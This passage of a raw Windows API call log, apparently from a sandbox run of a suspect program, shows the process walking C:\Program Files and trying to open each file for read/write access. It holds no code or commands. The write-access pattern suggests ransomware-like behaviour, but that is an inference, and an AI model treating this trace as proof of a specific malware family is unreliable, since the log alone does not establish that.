lpWideCharStr="C:\\Program Files\\Common Files\\System\\wab32.dll") returned 47 [0089.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\wab32.dll" (normalized: "c:\\program files\\common files\\system\\wab32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0089.280] GetFileType (hFile=0x420) returned 0x1 [0089.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0089.281] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.281] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.281] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.281] CloseHandle (hObject=0x420) returned 1 [0089.281] AreFileApisANSI () returned 1 [0089.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0089.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71688 [0089.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\wab32.dll") returned 47 [0089.282] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\wab32.dll" (normalized: "c:\\program files\\common files\\system\\wab32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.282] GetLastError () returned 0x5 [0089.282] GetLastError () returned 0x5 [0089.282] SetLastError (dwErrCode=0x5) [0089.282] GetLastError () returned 0x5 [0089.282] SetLastError (dwErrCode=0x5) [0089.282] GetLastError () returned 0x5 [0089.282] SetLastError (dwErrCode=0x5) [0089.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0089.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0089.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0089.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.286] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.286] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440d35a9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440d35a9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440d35a9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xeb600, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="wab32res.dll", cAlternateFileName="")) returned 1 [0089.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0089.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0089.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0089.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0089.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0089.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0089.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0089.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a430 [0089.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0089.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0089.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0089.287] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.287] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.287] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.287] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0089.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.287] AreFileApisANSI () returned 1 [0089.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\wab32res.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\wab32res.dll", lpUsedDefaultChar=0x0) returned 50 [0089.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0089.287] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.287] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0089.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0089.287] AreFileApisANSI () returned 1 [0089.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0089.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x465f8 [0089.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x465f8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\wab32res.dll") returned 50 [0089.287] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\wab32res.dll" (normalized: "c:\\program files\\common files\\system\\wab32res.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0089.289] GetFileType (hFile=0x420) returned 0x1 [0089.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0089.289] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.289] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.289] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.289] CloseHandle (hObject=0x420) returned 1 [0089.289] AreFileApisANSI () returned 1 [0089.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0089.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x462e8 [0089.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x462e8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\wab32res.dll") returned 50 [0089.290] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\wab32res.dll" (normalized: "c:\\program files\\common files\\system\\wab32res.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.290] GetLastError () returned 0x5 [0089.290] GetLastError () returned 0x5 [0089.290] SetLastError (dwErrCode=0x5) [0089.290] GetLastError () returned 0x5 [0089.290] SetLastError (dwErrCode=0x5) [0089.290] GetLastError () returned 0x5 [0089.290] SetLastError (dwErrCode=0x5) [0089.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0089.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0089.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0089.290] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.290] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.290] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x62, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x75f38, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x62, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ab", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓똀\x0e⺊Ā")) returned 0 [0089.290] FindClose (in: hFindFile=0x78550 | out: hFindFile=0x78550) returned 1 [0089.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0089.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0089.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0089.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0089.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0089.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0089.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0089.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0089.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0089.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0089.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0089.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0089.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0089.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0089.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0089.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0089.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0089.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.291] AreFileApisANSI () returned 1 [0089.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\desktop.ini", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\desktop.ini", lpUsedDefaultChar=0x0) returned 29 [0089.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0089.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0089.292] AreFileApisANSI () returned 1 [0089.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0089.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x53400 [0089.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53400, cchWideChar=29 | out: lpWideCharStr="C:\\Program Files\\desktop.ini") returned 29 [0089.292] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.292] GetFileType (hFile=0x418) returned 0x1 [0089.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0089.292] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.292] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.293] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.293] CloseHandle (hObject=0x418) returned 1 [0089.293] AreFileApisANSI () returned 1 [0089.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0089.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x53298 [0089.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=29 | out: lpWideCharStr="C:\\Program Files\\desktop.ini") returned 29 [0089.293] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.293] GetFileType (hFile=0x418) returned 0x1 [0089.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0089.293] CloseHandle (hObject=0x418) returned 1 [0089.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0089.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.294] AreFileApisANSI () returned 1 [0089.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0089.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x53640 [0089.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=29 | out: lpWideCharStr="C:\\Program Files\\desktop.ini") returned 29 [0089.294] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a307d95, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5d0779b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5d0779b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.294] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.294] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.294] FindNextFileW (in: hFindFile=0x78650, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x3b3e2eae, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3b3e2eae, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0089.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0089.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0089.295] HeapFree (in: hHeap=0x20000, 